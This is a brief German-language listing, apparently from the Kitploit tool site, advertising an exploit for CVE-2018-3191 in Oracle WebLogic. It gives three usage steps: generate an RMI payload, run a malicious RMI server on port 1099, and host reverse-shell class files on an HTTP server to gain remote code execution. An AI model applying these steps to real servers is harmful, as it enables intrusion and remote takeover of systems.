Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!
CVE-2018-3191-Rce-Exploit — Exploit für CVE-2018-3191, der Oracle WebLogic-Server angreift. Erzeugt eine schädliche Payload über RMI, stellt Reverse-Shell-Klassen auf einem HTTP-Server bereit und löst Remote-Code-Ausführung aus, um eine Reverse-Shell zu erhalten. | Kitploit
Exploit für CVE-2018-3191, der Oracle WebLogic-Server angreift. Erzeugt eine schädliche Payload über RMI, stellt Reverse-Shell-Klassen auf einem HTTP-Server bereit und löst Remote-Code-Ausführung aus, um eine Reverse-Shell zu erhalten.
Schritt 1: java -jar GenPayload.java output SJpayload.bin, Adresse ist die RMI-Server-Adresse
Schritt 2: java -jar RMISERVER.jar httpaddress, RMI-Server hört auf Port 1099 und lädt entfernte Reverse-Klassen auf den Webserver
Schritt 3: Legen Sie zwei Dateien (Reverse Shell) LoadObject.class und StreamConnection.class auf den HTTP-Server, sodass sie per URL aufgerufen werden können